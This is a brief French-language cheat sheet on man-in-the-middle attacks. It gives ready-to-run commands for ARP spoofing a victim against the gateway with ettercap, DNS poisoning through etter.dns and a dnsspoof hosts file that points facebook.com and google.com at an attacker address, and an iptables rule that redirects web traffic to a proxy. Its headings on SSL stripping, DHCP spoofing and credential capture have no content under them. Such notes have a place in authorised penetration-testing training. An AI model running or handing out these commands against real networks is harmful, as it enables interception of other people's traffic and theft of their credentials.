MITM

Attaque ARP Spoofing pour intercepter le trafic

ettercap -Tq -i eth0 -M arp:remote /IP_VICTIME/ /IP_PASSERELLE/

Empoisonnement DNS avec Ettercap

cat /etc/ettercap/etter.dns
# domaine_victime A adresse_attaquant

Lancer Ettercap :

  • Ajouter l'IP cible

  • Activer dns_spoof

Démarrer un faux serveur DNS avec dnsspoof

dnsspoof -i eth0 -f dns_hosts

Créer un fichier dns_hosts :

192.168.1.100 facebook.com
192.168.1.100 google.com

Redirection du trafic avec iptables

iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080

SSL Stripping pour capturer les requêtes HTTPS

DHCP Spoofing pour devenir le gateway

Proxy MITM avec mitmproxy

Analyser le trafic avec l'interface web de mitmproxy :

Capture des identifiants avec Wireshark ou tcpdump

Mis à jour